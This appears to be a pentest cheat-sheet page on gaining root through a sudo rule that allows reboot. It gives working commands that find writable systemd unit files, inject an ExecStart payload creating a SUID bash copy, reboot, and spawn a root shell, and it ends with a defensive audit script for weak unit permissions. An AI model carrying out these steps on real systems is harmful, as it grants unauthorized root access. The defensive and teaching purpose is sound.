Sudo Reboot Privilege Escalation

Last modified: 2023-02-05

Privilege Escalation

A sudo rule that allows running reboot might be abusable for privilege escalation (PrivEsc).


sudo -l

(ALL) NOPASSWD: /usr/sbin/reboot

If we can execute the "reboot" command as root, we can escalate privileges.


1. Find Service Config Files Which Are Writable

We need to look for system service config files that are writable.

find / -writable -name "*.service" 2>/dev/null


2. Insert a Payload

If we find a writable file, we can inject a payload into Service.ExecStart.

# /etc/systemd/system/example.service
[Unit]
Description=Zeno monitoring

[Service]
ExecStart=/bin/bash -c 'cp /bin/bash /home/<username>/bash; chmod +xs /home/<username>/bash'


3. Reboot and Get a Root Shell

Now reboot as root.

sudo /usr/sbin/reboot

After the system has rebooted, the command in ExecStart will have been executed.
Now we should get a root shell by executing the copied bash binary.

/home/<username>/bash -p
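
From the defender's side, the condition this technique depends on is a service unit, its directory, or the program named in ExecStart being modifiable by a non-root account. The audit script below is an added example, not part of the original page; it goes beyond the find command in step 1 by also checking directories and ExecStart targets, and the names TRUSTED_UID, weak_perms, scan_units and audit_units are chosen here. It assumes GNU stat and inspects owner and mode bits only, not POSIX ACLs.

```shell
#!/bin/sh
# Added example, not from the original page: report systemd service units (and
# the programs they start) that an account other than root can modify.
# TRUSTED_UID, weak_perms, scan_units and audit_units are names chosen here.
TRUSTED_UID="${TRUSTED_UID:-0}"

# weak_perms PATH: print why PATH is modifiable by a non-trusted account.
# Looks at owner and mode bits only (GNU stat); POSIX ACLs are not inspected.
weak_perms() {
    info=$(stat -L -c '%u %a' -- "$1" 2>/dev/null) || return 0
    uid=${info% *}; mode=${info#* }; why=""
    [ "$uid" = "$TRUSTED_UID" ] || why="owner-uid=$uid"
    [ $(( 0$mode & 020 )) -eq 0 ] || why="$why group-writable"
    [ $(( 0$mode & 002 )) -eq 0 ] || why="$why world-writable"
    printf '%s' "${why# }"
}

# scan_units DIR...: one "path<TAB>reasons" line per finding.
scan_units() {
    for dir in "$@"; do
        # Directories matter too: write access there allows replacing a unit.
        find "$dir" \( -type d -o -type f -name '*.service' \) 2>/dev/null |
        while IFS= read -r path; do
            why=$(weak_perms "$path")
            if [ -n "$why" ]; then printf '%s\t%s\n' "$path" "$why"; fi
            [ -f "$path" ] || continue
            # A root-owned unit is still unsafe if ExecStart runs a writable file.
            sed -n 's/^ExecStart=[[:space:]]*[-@:+!]*\([^[:space:]]*\).*/\1/p' "$path" |
            while IFS= read -r exe; do
                why=$(weak_perms "$exe")
                if [ -n "$why" ]; then
                    printf '%s\t%s (ExecStart of %s)\n' "$exe" "$why" "$path"
                fi
            done
        done
    done
}

# audit_units DIR...: print findings; return 1 if there are any, else 0.
audit_units() {
    findings=$(scan_units "$@")
    [ -n "$findings" ] || return 0
    printf '%s\n' "$findings"
    return 1
}

# Typical use: sh audit.sh /etc/systemd/system /usr/lib/systemd/system
if [ "$#" -gt 0 ]; then audit_units "$@"; fi
```

Any finding is worth fixing regardless of sudo rules, since unit files are also re-read on ordinary reboots and service restarts.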